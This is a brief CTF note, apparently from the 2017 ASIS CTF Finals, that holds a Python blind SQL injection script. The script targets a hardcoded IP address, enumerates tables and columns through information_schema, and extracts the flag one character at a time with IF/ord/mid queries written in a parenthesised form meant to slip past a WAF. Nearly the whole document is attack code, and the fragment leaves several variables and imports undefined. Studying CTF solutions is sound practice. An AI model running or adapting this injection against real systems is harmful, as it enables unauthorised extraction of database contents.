Manual SQLi WAF bypass from https://github.com/Voorivex/ctf/tree/master/2017-ASIS-CTF-Finals/GSA%20Main%20Server

MySQL IF statments: IF(expression ,expr_true, expr_false); 
                    IF(expression , return THIS if true,  return THIS if false);

#q = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
#q = "(select(group_concat(column_name))from(information_schema.columns)where(table_schema=database())and(table_name='flag'))"
q = "(select(flag)from(flag))"

out = ""
for i in range(1,30):
    for c in range(31,126):
        qq = "http://178.62.34.76/notConfirmedInformation/"+sys.argv[1]+"-if(ord(mid("+q+","+str(i)+",1))="+str(c)+",0,2)"
        #print (qq)
        body = requests.get(qq).text
        #print body
        visited2 = int(regex.findall(body)[0]) # What got changed
        if visited + 1 == visited2: # If changed, there was SQLi
            sys.stdout.write(chr(c))
            sys.stdout.flush()
            visited = visited2
            break
        if visited2==visited:
            pass
        else:
            pass
